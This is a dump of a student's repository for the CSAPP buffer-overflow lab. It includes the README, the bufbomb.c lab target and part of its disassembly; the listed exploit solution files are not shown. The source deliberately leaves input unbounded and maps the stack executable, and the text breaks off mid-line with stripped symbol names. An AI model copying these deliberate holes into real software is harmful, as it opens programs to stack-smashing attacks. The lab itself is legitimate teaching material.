├── ICS-LAB3实验指导书.docx
├── README.md
├── bufbomb
├── bufbomb.c
├── bufbomb_-D.s
├── bufbomb_-d.s
├── buflab-handout.tar
├── buflab.pdf
├── hex2raw
├── level0_smoke
    └── smoke_U201315075.txt
├── level1_fizz
    └── fizz_U201315075.txt
├── level2_bang
    ├── bang.o
    ├── bang.s
    └── bang_U201315075.txt
├── level3_bomb
    ├── bomb.o
    ├── bomb.s
    ├── bomb2.o
    ├── bomb2.s
    ├── bomb2_U201315075.txt
    └── bomb_U201315075.txt
├── level4_nitro
    ├── nitro.o
    ├── nitro.s
    └── nitro_U201315075.txt
└── makecookie


/ICS-LAB3实验指导书.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/ICS-LAB3实验指导书.docx
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
## Introduction

This [assignment](https://github.com/zhwhong/Bufbomb_CSAPP/blob/master/buflab.pdf) will help you develop a detailed understanding of IA-32 calling conventions and stack
organization. It involves applying a series of buffer overflow attacks on an executable file bufbomb in the
lab directory.

For the detailed lab procedure and steps, see my personal blog post [Bufbomb buffer overflow attack lab explained - CSAPP](http://zhwhong.cn/2017/05/29/buffer-overflow-attack/) or [Jianshu](http://www.jianshu.com/p/dc41c84cef17).

## Assignment

- Computer Systems, Spring 2017
- Lab Assignment 3: The Buffer Bomb
- Assigned: Apr. 20

## Reference

- [[My Blog] Bufbomb buffer overflow attack lab explained - CSAPP](http://zhwhong.cn/2017/05/29/buffer-overflow-attack/)
- [[Jianshu] Bufbomb buffer overflow attack lab explained](http://www.jianshu.com/p/dc41c84cef17) - [zhwhong](http://www.jianshu.com/u/38cd2a8c425e)
- [[pdf] buflab assignment](https://github.com/zhwhong/Bufbomb_CSAPP/blob/master/buflab.pdf)
- [[docx] ICS-LAB3实验指导书](https://github.com/zhwhong/Bufbomb_CSAPP/blob/master/ICS-LAB3%E5%AE%9E%E9%AA%8C%E6%8C%87%E5%AF%BC%E4%B9%A6.docx)
- [CSAPP 3e Attack lab](http://blog.csdn.net/lijun538/article/details/50682387)
- [Bufbomb Lab: buffer overflow attack experiment (Buffer Lab)](http://blog.sina.com.cn/s/blog_65eb367a0101exfa.html)
- [bufbomb lab notes and detailed steps](http://blog.csdn.net/q1w2e3r4470/article/details/44976755)
- [CSAPP Lab 4: buffer overflow lab bufbomb](http://m.blog.csdn.net/article/details?id=51500830)

--------------------------------------------------------------------------------
/bufbomb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/bufbomb
--------------------------------------------------------------------------------
/bufbomb.c:
--------------------------------------------------------------------------------
/*
 * bufbomb.c - Bomb program that is solved using a buffer overflow attack
 *
 * Copyright (c) 2002-2011, R. Bryant and D. O'Hallaron, All rights reserved.
 */
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include "support.h"
#include "gencookie.h"
#include "stack.h"

/*
 * This version of bufbomb uses mmap() to shift the stack to a stable
 * location, regardless of any stack randomization by the runtime system.
 */
#ifndef USE_MMAP
#define USE_MMAP
#endif

/* The "bottom" of the shifted stack will be at this address. This
 * location works on every Linux system we've tried it on over a
 * period of years. */
#ifdef USE_MMAP
#include <sys/mman.h>
#endif

/* Included for historical reasons. Better to run a VirtualBox Ubuntu
   Linux VM on your PC or Mac than to use Cygwin */
#ifdef __CYGWIN__
#include "getopt.h"
#endif

/* Binary code for HLT (halt) instruction */
#define HALT_INSTR 0xF4

/* Levels 0-3 are called once */
#define NORMAL_CNT 1
/* $begin getbuf-c */
/* Buffer size for getbuf */
#define NORMAL_BUFFER_SIZE 32

/* $end getbuf-c */
/* Level 4 (nitro mode) is called multiple times */
#define KABOOM_CNT 5
/* $begin kaboom-c */
/* Buffer size for getbufn */
#define KABOOM_BUFFER_SIZE 512

/* $end kaboom-c */
/* Global variables */
char *userid = NULL; /* user id [set by -u] */
int notify = 0;      /* if true, send exploits to grading server [set by -s] */
int autograde = 0;   /* if true, run in autograde mode with timeout [set by -g]*/

FILE *infile = NULL; /* always stdin */
unsigned cookie = 0; /* unique cookie computed from userid */
int success = 0;     /* set by validate() to indicate successful exploit */

/* Function prototypes */
void validate(int);
char *Gets(char *);
int getbuf();
int getbufn();
int uniqueval();

/*
 * The following is the part of the code students will actually look
 * at. They are put at the beginning of the file to make them easier
 * to find in the disassembly, and to make their locations more stable
 * when other parts of the code get modified.
 */

/*
 * smoke - On return from getbuf(), the level 0 exploit executes
 * the code for smoke() instead of returning to test().
 */
/* $begin smoke-c */
void smoke()
{
    printf("Smoke!: You called smoke()\n");
    validate(0);
    exit(0);
}
/* $end smoke-c */

/*
 * fizz - On return from getbuf(), the level 1 exploit executes the
 * code for fizz() instead of returning to test(), and makes it appear
 * that fizz() was passed the user's unique cookie as the argument.
 */
/* $begin fizz-c */
void fizz(int val)
{
    if (val == cookie) {
        printf("Fizz!: You called fizz(0x%x)\n", val);
        validate(1);

    } else
        printf("Misfire: You called fizz(0x%x)\n", val);
    exit(0);
}
/* $end fizz-c */

/*
 * bang - On return from getbuf(), the level 2 exploit executes the
 * code for bang() instead of returning to test(). Before transferring
 * control, it must execute code on the stack that sets a global
 * variable to the user's cookie.
 */
/* $begin bang-c */
int global_value = 0;

void bang(int val)
{
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    } else
        printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
}
/* $end bang-c */

/*
 * test - This function calls the function with the buffer overflow
 * bug. The exploits for levels 0-2 return from the getbuf() call to a
 * different function, which then immediately exits. The level 3
 * exploit must return to test() with local variable val set to the
 * user's cookie. This is tricky because, unlike the previous levels,
 * which simply transferred control, the exploit code must restore the
 * stack to support a proper return.
 */
/* $begin boom-c */
void test()
{
    int val;
    /* Put canary on stack to detect possible corruption */
    volatile int local = uniqueval();

    val = getbuf();

    /* Check for corrupted stack */
    if (local != uniqueval()) {
        printf("Sabotaged!: the stack has been corrupted\n");
    }
    else if (val == cookie) {
        printf("Boom!: getbuf returned 0x%x\n", val);
        validate(3);
    } else {
        printf("Dud: getbuf returned 0x%x\n", val);
    }
}
/* $end boom-c */


/*
 * testn - Calls the function with the buffer overflow bug exploited
 * by the level 4 exploit.
 */
void testn()
{
    int val;
    volatile int local = uniqueval();

    val = getbufn();

    /* Check for corrupted stack */
    if (local != uniqueval()) {
        printf("Sabotaged!: the stack has been corrupted\n");
    }
    else if (val == cookie) {
        printf("KABOOM!: getbufn returned 0x%x\n", val);
        validate(4);
    }
    else {
        printf("Dud: getbufn returned 0x%x\n", val);
    }
}

/******************
 * Helper functions
 ******************/

/*
 * Gets - Like gets(), except that can optionally (when hexformat
 * nonzero) accept format where characters are typed as pairs of hex
 * digits. Nondigit characters are ignored. Stops when encounters
 * newline. In addition, it stores the string in global buffer
 * gets_buf.
 */
#define GETLEN 1024

int gets_cnt = 0;
char gets_buf[3*GETLEN+1];

static char trans_char[16] =
    {'0', '1', '2', '3', '4', '5', '6', '7',
     '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'};

static void save_char(char c) {
    if (gets_cnt < GETLEN) {
        gets_buf[3*gets_cnt] = trans_char[(c>>4)&0xF];
        gets_buf[3*gets_cnt+1] = trans_char[c&0xF];
        gets_buf[3*gets_cnt+2] = ' ';
        gets_cnt++;
    }
}

static void save_term()
{
    gets_buf[3*gets_cnt] = '\0';
}

char *Gets(char *dest)
{
    int c;
    char *sp = dest;

    gets_cnt = 0;

    /* No bounds check on dest: this is the overflow the lab is built on */
    while ((c = getc(infile)) != EOF && c != '\n') {
        *sp++ = c;
        save_char(c);
    }

    *sp++ = '\0';
    save_term();
    return dest;
}


/*
 * usage - prints usage information
 */
static void usage(char *name)
{
    printf("Usage: %s -u [-nsh]\n", name);
    printf(" -u User ID\n");
    printf(" -n Nitro mode\n");
    printf(" -s Submit your solution to the grading server\n");
    printf(" -h Print help information\n");
    exit(0);
}

/*
 * Signal handlers for bus errors, seg faults, and illegal instruction
 * faults
 */
void bushandler(int sig)
{
    printf("Crash!: You caused a bus error!\n");
    printf("Better luck next time\n");
    exit(0);
}

void seghandler(int sig)
{
    printf("Ouch!: You caused a segmentation fault!\n");
    printf("Better luck next time\n");
    exit(0);
}

void illegalhandler(int sig)
{
    printf("Oops!: You executed an illegal instruction\n");
    printf("Better luck next time\n");
    exit(0);
}

/*
 * launch - Calls either test (normal mode) or testn (nitro mode)
 */
static void launch(int nitro, int offset)
{
    int localbuf[16];
    size_t stable_tweak = 0;
    int *space;
    /*
     * This little hack adjusts the stack. Without it, the stack
     * offset is different when the program is executed in the shell
     * and when it is executed in gdb. For normal mode, it tries to
     * put it into a stable position from one run to the next. In
     * nitro mode, it makes it even less stable than it would normally
     * be. You don't need to understand it to do the assignment.
     */
    stable_tweak = (((size_t) localbuf) & 0x3FF0);
    space = (int *) alloca(stable_tweak + offset);

    /* Fill full of halt instructions, so that will get seg fault */
    memset(space, HALT_INSTR, stable_tweak);

    /* Call the appropriate function */
    printf("Type string:");
    if (nitro)
        testn();
    else
        test();
    if (!success) {
        printf("Better luck next time\n");
        success = 0;
    }
}


/*
 * launcher - New version of the launching code that uses mmap() to
 * generate a stable stack position, regardless of any stack randomization
 * used by the runtime system.
 */

/* Must put context information in global vars, since stack will get
   messed up */
int global_nitro = 0;
int global_offset = 0;
volatile void *stack_top;
volatile void *global_save_stack = NULL;


void launcher(int nitro, int offset)
{
#ifdef USE_MMAP
    void *new_stack;
#endif

    /* Assign from stack to globals before we move the stack location */
    global_nitro = nitro;
    global_offset = offset;

#ifdef USE_MMAP
    /* The replacement stack is mapped readable, writable and executable */
    new_stack = mmap(START_ADDR, STACK_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
                     MAP_PRIVATE | MAP_GROWSDOWN | MAP_ANONYMOUS | MAP_FIXED,
                     0, 0);
    if (new_stack != START_ADDR) {
        fprintf(stderr, "Internal error. Couldn't use mmap. Try different value for START_ADDR\n");
        exit(1);
    }
    stack_top = new_stack + STACK_SIZE - 8;
    asm("movl %%esp,%%eax ; movl %1,%%esp ; movl %%eax,%0"
        : "=r" (global_save_stack)
        : "r" (stack_top)
        : "%eax"
        );
#endif

    launch(global_nitro, global_offset);


#ifdef USE_MMAP
    asm("movl %0,%%esp"
        :
        : "r" (global_save_stack)
        );
    munmap(new_stack, STACK_SIZE);
#endif
}

/*
 * uniqueval - Compute random value that will change from one execution to the next
 */
int uniqueval(){
    srandom(getpid());
    return random();
}


/*
 * main - The main routine
 */
int main(int argc, char *argv[])
{
    int cookie_tweak = 0;
    int nitro = 0; /* Run in unstable mode? */
    int i;
    int *offsets;
    int cnt = NORMAL_CNT; /* By default, call launcher once */
    int c; /* int, not char: getopt() returns int and is compared with -1 */

    /* Install handlers for the inevitable faults */
    signal(SIGSEGV, seghandler);
    signal(SIGBUS, bushandler);
    signal(SIGILL, illegalhandler);

    /* Parse command line arguments */
    infile = stdin;
    while ((c = getopt(argc, argv, "gsnhu:")) != -1)
        switch(c) {
        case 'h': /* print help info */
            usage(argv[0]);
            break;
        case 'n': /* run in nitro mode */
            nitro = 1;
            cnt = KABOOM_CNT; /* Call launcher multiple times */
            break;
        case 'u': /* userid */
            userid = strdup(optarg);
            cookie = gencookie(userid);
            break;
        case 's': /* submit exploit string to the grading server */
            if (!NOTIFY)
                printf("This is a quiet bomb. Ignoring -s flag.\n");
            notify = NOTIFY;
            break;
        case 'g': /* autograding mode, sets timeout */
            autograde = 1;
            break;
        default:
            usage(argv[0]);
        }

    /* Userid is a required argument */
    if (!userid) {
        printf("%s: Missing required argument (-u

:
 804873c:	53	push %ebx
 804873d:	83 ec 08	sub $0x8,%esp
 8048740:	e8 6b 02 00 00	call 80489b0 <__x86.get_pc_thunk.bx>
 8048745:	81 c3 bb 38 00 00	add $0x38bb,%ebx
 804874b:	8b 83 fc ff ff ff	mov -0x4(%ebx),%eax
 8048751:	85 c0	test %eax,%eax
 8048753:	74 05	je 804875a <_init+0x1e>
 8048755:	e8 e6 00 00 00	call 8048840 <__gmon_start__@plt>
 804875a:	83 c4 08	add $0x8,%esp
 804875d:	5b	pop %ebx
 804875e:	c3	ret

Disassembly of section .plt:

08048760 :
 8048760:	ff 35 04 c0 04 08	pushl 0x804c004
 8048766:	ff 25 08 c0 04 08	jmp *0x804c008
 804876c:	00 00	add %al,(%eax)
	...

08048770 :
 8048770:	ff 25 0c c0 04 08	jmp *0x804c00c
 8048776:	68 00 00 00 00	push $0x0
 804877b:	e9 e0 ff ff ff	jmp 8048760 <_init+0x24>

08048780 :
 8048780:	ff 25 10 c0 04 08	jmp *0x804c010
 8048786:	68 08 00 00 00	push $0x8
 804878b:	e9 d0 ff ff ff	jmp 8048760 <_init+0x24>

08048790 :
 8048790:	ff 25 14 c0 04 08	jmp *0x804c014
 8048796:	68 10 00 00 00	push $0x10
 804879b:	e9 c0 ff ff ff	jmp 8048760 <_init+0x24>

080487a0 :
 80487a0:	ff 25 18 c0 04 08	jmp *0x804c018
 80487a6:	68 18 00 00 00	push $0x18
 80487ab:	e9 b0 ff ff ff	jmp 8048760 <_init+0x24>

080487b0 :
 80487b0:	ff 25 1c c0 04 08	jmp *0x804c01c
 80487b6:	68 20 00 00 00	push $0x20
 80487bb:	e9 a0 ff ff ff	jmp 8048760 <_init+0x24>

080487c0 :
 80487c0:	ff 25 20 c0 04 08	jmp *0x804c020
 80487c6:	68 28 00 00 00	push $0x28
 80487cb:	e9 90 ff ff ff	jmp 8048760 <_init+0x24>

080487d0 <_IO_getc@plt>:
 80487d0:	ff 25 24 c0 04 08	jmp *0x804c024
 80487d6:	68 30 00 00 00	push $0x30
 80487db:	e9 80 ff ff ff	jmp 8048760 <_init+0x24>

080487e0 :
 80487e0:	ff 25 28 c0 04 08	jmp *0x804c028
 80487e6:	68 38 00 00 00	push $0x38
 80487eb:	e9 70 ff ff ff	jmp 8048760 <_init+0x24>

080487f0 :
 80487f0:	ff 25 2c c0 04 08	jmp *0x804c02c
 80487f6:	68 40 00 00 00	push $0x40
 80487fb:	e9 60 ff ff ff	jmp 8048760 <_init+0x24>

08048800 :
 8048800:	ff 25 30 c0 04 08	jmp *0x804c030
 8048806:	68 48 00 00 00	push $0x48
 804880b:	e9 50 ff ff ff	jmp 8048760 <_init+0x24>

08048810 :
 8048810:	ff 25 34 c0 04 08	jmp *0x804c034
 8048816:	68 50 00 00 00	push $0x50
 804881b:	e9 40 ff ff ff	jmp 8048760 <_init+0x24>

08048820 :
 8048820:	ff 25 38 c0 04 08	jmp *0x804c038
 8048826:	68 58 00 00 00	push $0x58
 804882b:	e9 30 ff ff ff	jmp 8048760 <_init+0x24>

08048830 :
 8048830:	ff 25 3c c0 04 08	jmp *0x804c03c
 8048836:	68 60 00 00 00	push $0x60
 804883b:	e9 20 ff ff ff	jmp 8048760 <_init+0x24>

08048840 <__gmon_start__@plt>:
 8048840:	ff 25 40 c0 04 08	jmp *0x804c040
 8048846:	68 68 00 00 00	push $0x68
 804884b:	e9 10 ff ff ff	jmp 8048760 <_init+0x24>

08048850 :
 8048850:	ff 25 44 c0 04 08	jmp *0x804c044
 8048856:	68 70 00 00 00	push $0x70
 804885b:	e9 00 ff ff ff	jmp 8048760 <_init+0x24>

08048860 :
 8048860:	ff 25 48 c0 04 08	jmp *0x804c048
 8048866:	68 78 00 00 00	push $0x78
 804886b:	e9 f0 fe ff ff	jmp 8048760 <_init+0x24>

08048870 :
 8048870:	ff 25 4c c0 04 08	jmp *0x804c04c
 8048876:	68 80 00 00 00	push $0x80
 804887b:	e9 e0 fe ff ff	jmp 8048760 <_init+0x24>

08048880 <__libc_start_main@plt>:
 8048880:	ff 25 50 c0 04 08	jmp *0x804c050
 8048886:	68 88 00 00 00	push $0x88
 804888b:	e9 d0 fe ff ff	jmp 8048760 <_init+0x24>

08048890 :
 8048890:	ff 25 54 c0 04 08	jmp *0x804c054
 8048896:	68 90 00 00 00	push $0x90
 804889b:	e9 c0 fe ff ff	jmp 8048760 <_init+0x24>

080488a0 :
 80488a0:	ff 25 58 c0 04 08	jmp *0x804c058
 80488a6:	68 98 00 00 00	push $0x98
 80488ab:	e9 b0 fe ff ff	jmp 8048760 <_init+0x24>

080488b0 <__isoc99_sscanf@plt>:
 80488b0:	ff 25 5c c0 04 08	jmp *0x804c05c
 80488b6:	68 a0 00 00 00	push $0xa0
 80488bb:	e9 a0 fe ff ff	jmp 8048760 <_init+0x24>

080488c0 :
 80488c0:	ff 25 60 c0 04 08	jmp *0x804c060
 80488c6:	68 a8 00 00 00	push $0xa8
 80488cb:	e9 90 fe ff ff	jmp 8048760 <_init+0x24>

080488d0 <__strdup@plt>:
 80488d0:	ff 25 64 c0 04 08	jmp *0x804c064
 80488d6:	68 b0 00 00 00	push $0xb0
 80488db:	e9 80 fe ff ff	jmp 8048760 <_init+0x24>

080488e0 <__errno_location@plt>:
 80488e0:	ff 25 68 c0 04 08	jmp *0x804c068
 80488e6:	68 b8 00 00 00	push $0xb8
 80488eb:	e9 70 fe ff ff	jmp 8048760 <_init+0x24>

080488f0 :
 80488f0:	ff 25 6c c0 04 08	jmp *0x804c06c
 80488f6:	68 c0 00 00 00	push $0xc0
 80488fb:	e9 60 fe ff ff	jmp 8048760 <_init+0x24>

08048900 :
 8048900:	ff 25 70 c0 04 08	jmp *0x804c070
 8048906:	68 c8 00 00 00	push $0xc8
 804890b:	e9 50 fe ff ff	jmp 8048760 <_init+0x24>

08048910 :
 8048910:	ff 25 74 c0 04 08	jmp *0x804c074
 8048916:	68 d0 00 00 00	push $0xd0
 804891b:	e9 40 fe ff ff	jmp 8048760 <_init+0x24>

08048920 :
 8048920:	ff 25 78 c0 04 08	jmp *0x804c078
 8048926:	68 d8 00 00 00	push $0xd8
 804892b:	e9 30 fe ff ff	jmp 8048760 <_init+0x24>

08048930 :
 8048930:	ff 25 7c c0 04 08	jmp *0x804c07c
 8048936:	68 e0 00 00 00	push $0xe0
 804893b:	e9 20 fe ff ff	jmp 8048760 <_init+0x24>

08048940 :
 8048940:	ff 25 80 c0 04 08	jmp *0x804c080
 8048946:	68 e8 00 00 00	push $0xe8
 804894b:	e9 10 fe ff ff	jmp 8048760 <_init+0x24>

08048950 :
 8048950:	ff 25 84 c0 04 08	jmp *0x804c084
 8048956:	68 f0 00 00 00	push $0xf0
 804895b:	e9 00 fe ff ff	jmp 8048760 <_init+0x24>

08048960 :
 8048960:	ff 25 88 c0 04 08	jmp *0x804c088
 8048966:	68 f8 00 00 00	push $0xf8
 804896b:	e9 f0 fd ff ff	jmp 8048760 <_init+0x24>

08048970 :
 8048970:	ff 25 8c c0 04 08	jmp *0x804c08c
 8048976:	68 00 01 00 00	push $0x100
 804897b:	e9 e0 fd ff ff	jmp 8048760 <_init+0x24>

Disassembly of section .text:

08048980 <_start>:
 8048980:	31 ed	xor %ebp,%ebp
 8048982:	5e	pop %esi
 8048983:	89 e1	mov %esp,%ecx
 8048985:	83 e4 f0	and $0xfffffff0,%esp
 8048988:	50	push %eax
 8048989:	54	push %esp
 804898a:	52	push %edx
 804898b:	68 b0 9e 04 08	push $0x8049eb0
 8048990:	68 40 9e 04 08	push $0x8049e40
 8048995:	51	push %ecx
 8048996:	56	push %esi
 8048997:	68 da 8e 04 08	push $0x8048eda
 804899c:	e8 df fe ff ff	call 8048880 <__libc_start_main@plt>
 80489a1:	f4	hlt
 80489a2:	66 90	xchg %ax,%ax
 80489a4:	66 90	xchg %ax,%ax
 80489a6:	66 90	xchg %ax,%ax
 80489a8:	66 90	xchg %ax,%ax
 80489aa:	66 90	xchg %ax,%ax
 80489ac:	66 90	xchg %ax,%ax
 80489ae:	66 90	xchg %ax,%ax

080489b0 <__x86.get_pc_thunk.bx>:
 80489b0:	8b 1c 24	mov (%esp),%ebx
 80489b3:	c3	ret
 80489b4:	66 90	xchg %ax,%ax
 80489b6:	66 90	xchg %ax,%ax
 80489b8:	66 90	xchg %ax,%ax
 80489ba:	66 90	xchg %ax,%ax
 80489bc:	66 90	xchg %ax,%ax
 80489be:	66 90	xchg %ax,%ax

080489c0 :
 80489c0:	b8 e3 d0 04 08	mov $0x804d0e3,%eax
 80489c5:	2d e0 d0 04 08	sub $0x804d0e0,%eax
 80489ca:	83 f8 06	cmp $0x6,%eax
 80489cd:	77 01	ja 80489d0
 80489cf:	c3	ret
 80489d0:	b8 00 00 00 00	mov $0x0,%eax
 80489d5:	85 c0	test %eax,%eax
 80489d7:	74 f6	je 80489cf
 80489d9:	55	push %ebp
 80489da:	89 e5	mov %esp,%ebp
 80489dc:	83 ec 18	sub $0x18,%esp
 80489df:	c7 04 24 e0 d0 04 08	movl $0x804d0e0,(%esp)
 80489e6:	ff d0	call *%eax
 80489e8:	c9	leave
 80489e9:	c3	ret
 80489ea:	8d b6 00 00 00 00	lea 0x0(%esi),%esi

080489f0 :
 80489f0:	b8 e0 d0 04 08	mov $0x804d0e0,%eax
 80489f5:	2d e0 d0 04 08	sub $0x804d0e0,%eax
 80489fa:	c1 f8 02	sar $0x2,%eax
 80489fd:	89 c2	mov %eax,%edx
 80489ff:	c1 ea 1f	shr $0x1f,%edx
 8048a02:	01 d0	add %edx,%eax
 8048a04:	d1 f8	sar %eax
 8048a06:	75 01	jne 8048a09
 8048a08:	c3	ret
 8048a09:	ba 00 00 00 00	mov $0x0,%edx
 8048a0e:	85 d2	test %edx,%edx
 8048a10:	74 f6	je 8048a08
 8048a12:	55	push %ebp
 8048a13:	89 e5	mov %esp,%ebp
 8048a15:	83 ec 18	sub $0x18,%esp
 8048a18:	89 44 24 04	mov %eax,0x4(%esp)
 8048a1c:	c7 04 24 e0 d0 04 08	movl $0x804d0e0,(%esp)
 8048a23:	ff d2	call *%edx
 8048a25:	c9	leave
 8048a26:	c3	ret
 8048a27:	89 f6	mov %esi,%esi
 8048a29:	8d bc 27 00 00 00 00	lea 0x0(%edi,%eiz,1),%edi

08048a30 <__do_global_dtors_aux>:
 8048a30:	80 3d ec d0 04 08 00	cmpb $0x0,0x804d0ec
 8048a37:	75 13	jne 8048a4c <__do_global_dtors_aux+0x1c>
 8048a39:	55	push %ebp
 8048a3a:	89 e5	mov %esp,%ebp
 8048a3c:	83 ec 08	sub $0x8,%esp
 8048a3f:	e8 7c ff ff ff	call 80489c0
 8048a44:	c6 05 ec d0 04 08 01	movb $0x1,0x804d0ec
 8048a4b:	c9	leave
 8048a4c:	f3 c3	repz ret
 8048a4e:	66 90	xchg %ax,%ax

08048a50 :
 8048a50:	a1 10 bf 04 08	mov 0x804bf10,%eax
 8048a55:	85 c0	test %eax,%eax
 8048a57:	74 1f	je 8048a78
 8048a59:	b8 00 00 00 00	mov $0x0,%eax
 8048a5e:	85 c0	test %eax,%eax
 8048a60:	74 16	je 8048a78
 8048a62:	55	push %ebp
 8048a63:	89 e5	mov %esp,%ebp
 8048a65:	83 ec 18	sub $0x18,%esp
 8048a68:	c7 04 24 10 bf 04 08	movl $0x804bf10,(%esp)
 8048a6f:	ff d0	call *%eax
 8048a71:	c9	leave
 8048a72:	e9 79 ff ff ff	jmp 80489f0
 8048a77:	90	nop
 8048a78:	e9 73 ff ff ff	jmp 80489f0
 8048a7d:	66 90	xchg %ax,%ax
 8048a7f:	90	nop

08048a80 :
 8048a80:	55	push %ebp
 8048a81:	89 e5	mov %esp,%ebp
 8048a83:	83 ec 18	sub $0x18,%esp
 8048a86:	c7 04 24 d4 9e 04 08	movl $0x8049ed4,(%esp)
 8048a8d:	e8 9e fd ff ff	call 8048830
 8048a92:	c7 04 24 b4 a0 04 08	movl $0x804a0b4,(%esp)
 8048a99:	e8 92 fd ff ff	call 8048830
 8048a9e:	c7 04 24 00 00 00 00	movl $0x0,(%esp)
 8048aa5:	e8 a6 fd ff ff	call 8048850

08048aaa :
 8048aaa:	55	push %ebp
 8048aab:	89 e5	mov %esp,%ebp
 8048aad:	83 ec 18	sub $0x18,%esp
 8048ab0:	c7 04 24 f4 9e 04 08	movl $0x8049ef4,(%esp)
 8048ab7:	e8 74 fd ff ff	call 8048830
 8048abc:	c7 04 24 b4 a0 04 08	movl $0x804a0b4,(%esp)
 8048ac3:	e8 68 fd ff ff	call 8048830
 8048ac8:	c7 04 24 00 00 00 00	movl $0x0,(%esp)
 8048acf:	e8 7c fd ff ff	call 8048850

08048ad4 :
 8048ad4:	55	push %ebp
 8048ad5:	89 e5	mov %esp,%ebp
 8048ad7:	83 ec 18	sub $0x18,%esp
 8048ada:	c7 04 24 1c 9f 04 08	movl $0x8049f1c,(%esp)
 8048ae1:	e8 4a fd ff ff	call 8048830
 8048ae6:	c7 04 24 b4 a0 04 08	movl $0x804a0b4,(%esp)
 8048aed:	e8 3e fd ff ff	call 8048830
 8048af2:	c7 04 24 00 00 00 00	movl $0x0,(%esp)
 8048af9:	e8 52 fd ff ff	call 8048850

08048afe :
 8048afe:	55	push %ebp
 8048aff:	89 e5	mov %esp,%ebp
 8048b01:	83 ec 18	sub $0x18,%esp
 8048b04:	89 44 24 04	mov %eax,0x4(%esp)
 8048b08:	c7 04 24 ca a0 04 08	movl $0x804a0ca,(%esp)
 8048b0f:	e8 7c fc ff ff	call 8048790
 8048b14:	c7 04 24 e8 a0 04 08	movl $0x804a0e8,(%esp)
 8048b1b:	e8 10 fd ff ff	call 8048830
 8048b20:	c7 04 24 fe a0 04 08	movl $0x804a0fe,(%esp)
 8048b27:	e8 04 fd ff ff	call 8048830
 8048b2c:	c7 04 24 48 9f 04 08	movl $0x8049f48,(%esp)
 8048b33:	e8 f8 fc ff ff	call 8048830
 8048b38:	c7 04 24 84 9f 04 08	movl $0x8049f84,(%esp)
 8048b3f:	e8 ec fc ff ff	call 8048830
 8048b44:	c7 04 24 00 00 00 00	movl $0x0,(%esp)
 8048b4b:	e8 00 fd ff ff	call 8048850

08048b50 :
 8048b50:	55	push %ebp
 8048b51:	89 e5	mov %esp,%ebp
 8048b53:	83 ec 18	sub $0x18,%esp
 8048b56:	c7 04 24 17 a1 04 08	movl $0x804a117,(%esp)
 8048b5d:	e8 ce fc ff ff	call 8048830
 8048b62:	c7 04 24 00 00 00 00	movl $0x0,(%esp)
 8048b69:	e8 f4 05 00 00	call 8049162
 8048b6e:	c7 04 24 00 00 00 00	movl $0x0,(%esp)
 8048b75:	e8 d6 fc ff ff	call 8048850

08048b7a :
 8048b7a:	55	push %ebp
 8048b7b:	89 e5	mov %esp,%ebp
 8048b7d:	83 ec 18	sub $0x18,%esp
 8048b80:	8b 45 08	mov 0x8(%ebp),%eax
 8048b83:	3b 05 08 d1 04 08	cmp 0x804d108,%eax
 8048b89:	75 1e	jne 8048ba9
 8048b8b:	89 44 24 04	mov %eax,0x4(%esp)
 8048b8f:	c7 04 24 32 a1 04 08	movl $0x804a132,(%esp)
 8048b96:	e8 f5 fb ff ff	call 8048790
 8048b9b:	c7 04 24 01 00 00 00	movl $0x1,(%esp)
 8048ba2:	e8 bb 05 00 00	call 8049162
 8048ba7:	eb 10	jmp 8048bb9
 8048ba9:	89 44 24 04	mov %eax,0x4(%esp)
 8048bad:	c7 04 24 ac 9f 04 08	movl $0x8049fac,(%esp)
 8048bb4:	e8 d7 fb ff ff	call 8048790
 8048bb9:	c7 04 24 00 00 00 00	movl $0x0,(%esp)
 8048bc0:	e8 8b fc ff ff	call 8048850

08048bc5 :
 8048bc5:	55	push %ebp
 8048bc6:	89 e5	mov %esp,%ebp
 8048bc8:	83 ec 18	sub $0x18,%esp
 8048bcb:	a1 00 d1 04 08	mov 0x804d100,%eax
 8048bd0:	3b 05 08 d1 04 08	cmp 0x804d108,%eax
 8048bd6:	75 1e	jne 8048bf6
 8048bd8:	89 44 24 04	mov %eax,0x4(%esp)
 8048bdc:	c7 04 24 cc 9f 04 08	movl $0x8049fcc,(%esp)
 8048be3:	e8 a8 fb ff ff	call 8048790
 8048be8:	c7 04 24 02 00 00 00	movl $0x2,(%esp)
 8048bef:	e8 6e 05 00 00	call 8049162
 8048bf4:	eb 10	jmp 8048c06
 8048bf6:	89 44 24 04	mov %eax,0x4(%esp)
 8048bfa:	c7 04 24 50 a1 04 08	movl $0x804a150,(%esp)
 8048c01:	e8 8a fb ff ff	call 8048790
 8048c06:	c7 04 24 00 00 00 00	movl $0x0,(%esp)
 8048c0d:	e8 3e fc ff ff	call 8048850

08048c12 :
 8048c12:	55	push %ebp
 8048c13:	89 e5	mov %esp,%ebp
 8048c15:	57	push %edi
 8048c16:	56	push %esi
 8048c17:	53	push %ebx
 8048c18:	83 ec 1c	sub $0x1c,%esp
 8048c1b:	8b 75 08	mov 0x8(%ebp),%esi
 8048c1e:	c7 05 fc d0 04 08 00	movl $0x0,0x804d0fc
 8048c25:	00 00 00
 8048c28:	89 f3	mov %esi,%ebx
 8048c2a:	eb 49	jmp 8048c75
 8048c2c:	83 c3 01	add $0x1,%ebx
 8048c2f:	88 53 ff	mov %dl,-0x1(%ebx)
 8048c32:	a1 fc d0 04 08	mov 0x804d0fc,%eax
 8048c37:	3d ff 03 00 00	cmp $0x3ff,%eax
 8048c3c:	7f 37	jg 8048c75
 8048c3e:	8d 3c 40	lea (%eax,%eax,2),%edi
 8048c41:	89 d1	mov %edx,%ecx
 8048c43:	c0 e9 04	shr $0x4,%cl
 8048c46:	0f be c9	movsbl %cl,%ecx
 8048c49:	0f b6 89 2c a2 04 08	movzbl 0x804a22c(%ecx),%ecx
 8048c50:	88 8f 40 d1 04 08	mov %cl,0x804d140(%edi)
 8048c56:	83 e2 0f	and $0xf,%edx
